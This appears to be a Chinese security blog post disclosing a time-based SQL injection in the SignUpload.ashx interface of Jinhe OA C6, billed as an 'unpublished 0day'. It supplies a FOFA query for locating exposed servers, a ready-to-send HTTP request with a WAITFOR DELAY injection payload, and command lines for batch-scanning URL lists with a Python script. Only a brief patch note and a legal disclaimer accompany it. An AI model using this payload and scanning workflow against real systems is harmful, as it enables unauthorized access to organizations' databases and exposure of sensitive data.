【未公开0day】金和OAC6 SignUpload SQL注入漏洞【附poc】

免责声明:本文仅用于技术学习和讨论。请勿使用本文所提供的内容及相关技术从事非法活动,若利用本文提供的内容或工具造成任何直接或间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。

fofa语法

复制代码
product="金和网络-金和OA"

一、漏洞简述

某和OAC6协同管理平台是以"精确管理思想"为灵魂,围绕"企业协同四层次理论"模型,并紧紧抓住现代企业管理的六个核心要素:文化 Culture、沟通Communication、协作Collaboration、创新 Creation、控制 Control、中心 Center,而构建了结构化的、灵活集成的、动态响应的、面向企业运营管理的智慧协同应用管理平台。其接口SignUpload存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、漏洞检测poc

复制代码
GET /C6/Jhsoft.Web.ask/SignUpload.ashx?token=1%3BWAITFOR+DELAY+%270%3A0%3A%205%27+--%20and%201=1_2&filename=11111 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537
Accept-Encoding: gzip
Connection: close

三、漏洞检测脚本

安全测试人员可通过该脚本进行探测自身服务是否存在此漏洞:

POC下载链接:POC下载

批量检测:

python JinHeOAC6_SignUpload_SQLInject.py -f url.txt

单个url检测漏洞:

python JinHeOAC6_SignUpload_SQLInject.py -u url

四、修复

官方已更新补丁,请升级至最新版本。

相关推荐
数安旭说11 小时前
从“堆叠工具”到“一体化治理”:端点安全的技术演进与实践观察
网络安全·系统架构·数据安全·企业安全·端点安全·防泄密·一体化管理
白猫不黑13 小时前
Python实现简易Web弱口令爆破与防护方案
python·web安全·计算机·网络安全·黑客·信息安全·渗透测试
迪康Defender14 小时前
终端安全实战:如何高效解决企业U盘泄密与管控难题
运维·网络·安全·web安全·终端安全管理
网安小学生(兼顾数据库版)14 小时前
固件+软件供应链:ONEKEY+Mend如何实现全链路安全覆盖
网络·安全·web安全
菩提小狗16 小时前
每日安全情报报告 · 2026-09-17
网络安全·漏洞·cve·安全情报·每日安全
2601_9663771319 小时前
176号令10月1日施行|网安检查换新规矩,数达数安版等保一体机方案助企业从容应对
网络安全·数据安全·数安版等保一体机
qingtian!21 小时前
VM中安装WinServer2016详细教程
网络安全
罗斯83921 小时前
EMBER恶意软件基准数据集
人工智能·算法·安全·网络安全
恣睢s1 天前
MISC杂项——Base加密加密
网络安全
黄金龙PLUS1 天前
5个800比特大状态置换算法的设计与分析
算法·网络安全·密码学·哈希算法·同态加密